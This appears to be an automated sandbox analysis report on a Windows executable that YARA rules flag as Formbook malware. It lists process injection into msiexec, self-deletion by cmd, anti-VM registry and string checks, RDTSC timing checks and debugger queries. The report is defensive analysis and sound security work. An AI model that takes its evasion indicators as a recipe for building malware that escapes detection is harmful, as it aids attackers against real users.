Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F199BF	2_2_00F199BF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F14120	2_2_00F14120
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFF900	2_2_00EFF900
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4AEF	2_2_00FB4AEF
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC22AE	2_2_00FC22AE
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B236	2_2_00F1B236
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FAFA2B	2_2_00FAFA2B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FA23E3	2_2_00FA23E3
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB03DA	2_2_00FB03DA
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FBDBD2	2_2_00FBDBD2
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2ABD8	2_2_00F2ABD8
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2EBB0	2_2_00F2EBB0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1EB9A	2_2_00F1EB9A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2138B	2_2_00F2138B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1AB40	2_2_00F1AB40
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F9CB4F	2_2_00F9CB4F
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC2B28	2_2_00FC2B28
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B477	2_2_00F1B477
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FBD466	2_2_00FBD466
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0841F	2_2_00F0841F
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0D5E0	2_2_00F0D5E0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC25DD	2_2_00FC25DD
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F22581	2_2_00F22581
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB2D82	2_2_00FB2D82
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC1D55	2_2_00FC1D55
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF0D20	2_2_00EF0D20
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC2D07	2_2_00FC2D07
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC2EF7	2_2_00FC2EF7
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F16E30	2_2_00F16E30
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FBD616	2_2_00FBD616
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC1FF1	2_2_00FC1FF1
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FCDFCE	2_2_00FCDFCE

Source: C:\Users\user\Desktop\YvGnm93rap.exe

Code function: String function: 00EFB150 appears 139 times

Source: YvGnm93rap.exe, 00000000.00000002.226831421.0000000000BD2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameyYI.exeR vs YvGnm93rap.exe
Source: YvGnm93rap.exe, 00000000.00000002.227198607.000000000136A000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs YvGnm93rap.exe
Source: YvGnm93rap.exe, 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs YvGnm93rap.exe
Source: YvGnm93rap.exe, 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs YvGnm93rap.exe
Source: YvGnm93rap.exe, 00000000.00000002.227438383.0000000003090000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs YvGnm93rap.exe
Source: YvGnm93rap.exe, 00000002.00000003.226728460.0000000000CB6000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs YvGnm93rap.exe
Source: YvGnm93rap.exe, 00000002.00000000.226123201.0000000000502000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameyYI.exeR vs YvGnm93rap.exe
Source: YvGnm93rap.exe, 00000002.00000002.267167548.000000000125F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemsiexec.exeX vs YvGnm93rap.exe
Source: YvGnm93rap.exe	Binary or memory string: OriginalFilenameyYI.exeR vs YvGnm93rap.exe

Source: C:\Windows\SysWOW64\msiexec.exe

Section loaded: sfc.dll

Jump to behavior

Source: YvGnm93rap.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: YvGnm93rap.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: YvGnm93rap.exe, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: YvGnm93rap.exe, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: YvGnm93rap.exe, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@19/7

Source: C:\Users\user\Desktop\YvGnm93rap.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YvGnm93rap.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_01

Source: YvGnm93rap.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\YvGnm93rap.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\YvGnm93rap.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: YvGnm93rap.exe	Virustotal: Detection: 46%
Source: YvGnm93rap.exe	ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Users\user\Desktop\YvGnm93rap.exe 'C:\Users\user\Desktop\YvGnm93rap.exe'
Source: unknown	Process created: C:\Users\user\Desktop\YvGnm93rap.exe {path}
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\YvGnm93rap.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process created: C:\Users\user\Desktop\YvGnm93rap.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\YvGnm93rap.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\YvGnm93rap.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: YvGnm93rap.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: YvGnm93rap.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: YvGnm93rap.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: msiexec.pdb source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
Source:	Binary string: msiexec.pdbGCTL source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: YvGnm93rap.exe, 00000002.00000003.226603868.0000000000BA0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: YvGnm93rap.exe

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: YvGnm93rap.exe, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0x87A8763C [Fri Feb 14 04:21:16 2042 UTC]

Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_0041C952 push 06E61A6Ah; ret	2_2_0041C973
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_0041C932 push 06E61A6Ah; ret	2_2_0041C973
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_0041B3B5 push eax; ret	2_2_0041B408
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_0041B46C push eax; ret	2_2_0041B472
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_0041B402 push eax; ret	2_2_0041B408
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_0041B40B push eax; ret	2_2_0041B472
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F4D0D1 push ecx; ret	2_2_00F4D0E4

Source: initial sample

Static PE information: section name: .text entropy: 7.87823365772

Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YvGnm93rap.exe PID: 2396, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\YvGnm93rap.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YvGnm93rap.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msiexec.exe	RDTSC instruction interceptor: First address: 0000000002E485E4 second address: 0000000002E485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msiexec.exe	RDTSC instruction interceptor: First address: 0000000002E4897E second address: 0000000002E48984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\YvGnm93rap.exe

Code function: 2_2_004088B0 rdtsc

2_2_004088B0

Source: C:\Users\user\Desktop\YvGnm93rap.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\YvGnm93rap.exe TID: 1004	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe TID: 2616	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4604	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6932	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6932	Thread sleep time: -76000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed

Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000003.00000000.239789779.0000000004DF3000.00000004.00000001.sdmp	Binary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&L
Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.245156332.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp	Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.240164900.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.245453797.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000003.00000003.562890431.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp	Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\YvGnm93rap.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\YvGnm93rap.exe

Code function: 2_2_004088B0 rdtsc

2_2_004088B0

Source: C:\Users\user\Desktop\YvGnm93rap.exe

Code function: 2_2_00409B20 LdrLoadDll,

2_2_00409B20

Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF58EC mov eax, dword ptr fs:[00000030h]	2_2_00EF58EC
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF40E1 mov eax, dword ptr fs:[00000030h]	2_2_00EF40E1
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF40E1 mov eax, dword ptr fs:[00000030h]	2_2_00EF40E1
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF40E1 mov eax, dword ptr fs:[00000030h]	2_2_00EF40E1
